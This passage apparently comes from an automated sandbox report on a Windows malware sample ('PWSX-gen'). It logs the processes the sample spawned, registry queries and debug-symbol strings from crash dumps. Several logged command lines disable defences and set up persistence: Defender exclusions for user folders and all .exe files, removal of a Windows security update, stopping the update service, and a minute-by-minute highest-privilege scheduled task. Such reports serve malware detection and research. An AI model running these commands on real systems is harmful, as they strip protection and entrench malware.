                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\spczxf.exe "C:\Users\user\AppData\Local\Temp\spczxf.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\ohvrxt.exe "C:\Users\user\AppData\Local\Temp\ohvrxt.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\hgzxhw.exe "C:\Users\user\AppData\Local\Temp\hgzxhw.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\utntwb.exe "C:\Users\user\AppData\Local\Temp\utntwb.exe" Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 432 -s 1216Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120Jump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Windows\System32\WerFault.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: System.Drawing.Design.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Diagnostics.Tracing.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdb:\W@ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdb(~ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Net.Http.WebRequest.pdbh- source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Messaging.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.WorkflowServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceProcess.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XsdBuildTask.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Device.pdb$ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceProcess.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.ApplicationServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XsdBuildTask.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: HFayo.pdb source: WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: sysglobl.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.RegularExpressions.pdbMZ@ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: NGenTaskLauncher.pdbSystem.Runtime.Serialization.Formatters.dllSystem.Runtime.CompilerServices.VisualC.dllSystem.Diagnostics.TextWriterTraceListener.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: CustomMarshalers.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Compression.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Activities.Build.pdbSystem.Net.WebSockets.Client.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.pdbH source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.DurableInstancing.pdb:\W source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: 0C:\Windows\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualC.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdbp source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.ComponentModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Activation.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: mscorlib.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp, WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: ISymWrapper.pdb$XPAxq source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.pdb` source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.AddIn.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Discovery.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Internals.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Services.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Entity.Design.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdbSystem.Collections.Specialized.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Numerics.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb( source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Net.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdb` source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Entity.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.Vectors.pdbp^ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Security.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdbY source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\HFayo.pdbb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IdentityModel.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdbH source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb6 source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceProcess.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.Install.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Design.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Xml.Serialization.pdbJ> source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xaml.Hosting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.Design.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\HFayo.pdbL source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.Linq.pdbpH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.WorkflowServices.pdbh source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Linq.pdbP< source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbSystem.WorkflowServices.dllSystem.WorkflowServices.dllSystem.ServiceModel.Web.dllSystem.ServiceModel.NetTcp.dllSystem.ServiceModel.Web.dllp source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Deployment.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb>sFm source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.Extensions.pdbMZ@ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IdentityModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Presentation.pdbXK source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.WorkflowServices.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Messaging.pdbh source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.SqlXml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdbbb source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xml.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbe source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99254000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\HFayo.pdbVi.pdbpdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Data.SqlXml.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Windows.Forms.pdb[' source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Management.pdbH source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: NGenTaskLauncher.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbT source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.AddIn.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv10.03P source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.Data.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: SMDiagnostics.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdbP.d source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.WasHosting.pdbP source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.DynamicData.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Diagnostics.Tracing.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Windows.ApplicationServer.Applications.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Internal.Tasks.Dataflow.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Internal.Tasks.Dataflow.pdbSystem.Messaging.dllSystem.Data.Linq.dllSystem.Data.SqlXml.dllSystem.Deployment.dllH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.ComponentModel.pdb8N source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.Runtime.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: NGenTaskLauncher.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Numerics.pdbMicrosoft.Data.Entity.Build.Tasks.dllSystem.Runtime.InteropServices.RuntimeInformation.dllSystem.Runtime.InteropServices.RuntimeInformation.dllH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Data.Linq.pdb0 source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.Dtc.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Management.Instrumentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Client.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Extensions.Design.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xaml.Hosting.pdb_L source: WER85A6.tmp.dmp.15.dr
